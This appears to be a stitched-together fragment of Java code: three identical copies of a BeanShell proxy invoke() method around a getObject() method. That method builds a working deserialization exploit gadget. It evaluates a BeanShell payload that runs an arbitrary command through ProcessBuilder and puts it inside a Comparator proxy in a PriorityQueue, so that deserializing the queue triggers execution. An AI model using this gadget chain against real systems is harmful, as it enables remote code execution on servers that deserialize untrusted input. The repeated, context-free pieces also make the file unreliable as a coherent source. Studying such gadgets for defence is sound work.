@Override @Nullable public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { if (ReflectionUtils.isEqualsMethod(method)) { return (isProxyForSameBshObject(args[0])); } else if (ReflectionUtils.isHashCodeMethod(method)) { return this.xt.hashCode(); } else if (ReflectionUtils.isToStringMethod(method)) { return "BeanShell object [" + this.xt + "]"; } try { Object result = this.xt.invokeMethod(method.getName(), args); if (result == Primitive.NULL || result == Primitive.VOID) { return null; } if (result instanceof Primitive) { return ((Primitive) result).getValue(); } return result; } catch (EvalError ex) { throw new BshExecutionException(ex); } }
public PriorityQueue getObject(String command) throws Exception { // BeanShell payload String payload = "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" + Strings.join( // does not support spaces in quotes Arrays.asList(command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\\"").split(" ")), ",", "\"", "\"") + "}).start();return new Integer(1);}"; // Create Interpreter Interpreter i = new Interpreter(); // Evaluate payload i.eval(payload); // Create InvocationHandler XThis xt = new XThis(i.getNameSpace(), i); InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt); // Create Comparator Proxy Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler); // Prepare Trigger Gadget (will call Comparator.compare() during deserialization) final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator); Object[] queue = new Object[] {1,1}; Reflections.setFieldValue(priorityQueue, "queue", queue); Reflections.setFieldValue(priorityQueue, "size", 2); return priorityQueue; }
@Override @Nullable public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { if (ReflectionUtils.isEqualsMethod(method)) { return (isProxyForSameBshObject(args[0])); } else if (ReflectionUtils.isHashCodeMethod(method)) { return this.xt.hashCode(); } else if (ReflectionUtils.isToStringMethod(method)) { return "BeanShell object [" + this.xt + "]"; } try { Object result = this.xt.invokeMethod(method.getName(), args); if (result == Primitive.NULL || result == Primitive.VOID) { return null; } if (result instanceof Primitive) { return ((Primitive) result).getValue(); } return result; } catch (EvalError ex) { throw new BshExecutionException(ex); } }
@Override @Nullable public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { if (ReflectionUtils.isEqualsMethod(method)) { return (isProxyForSameBshObject(args[0])); } else if (ReflectionUtils.isHashCodeMethod(method)) { return this.xt.hashCode(); } else if (ReflectionUtils.isToStringMethod(method)) { return "BeanShell object [" + this.xt + "]"; } try { Object result = this.xt.invokeMethod(method.getName(), args); if (result == Primitive.NULL || result == Primitive.VOID) { return null; } if (result instanceof Primitive) { return ((Primitive) result).getValue(); } return result; } catch (EvalError ex) { throw new BshExecutionException(ex); } }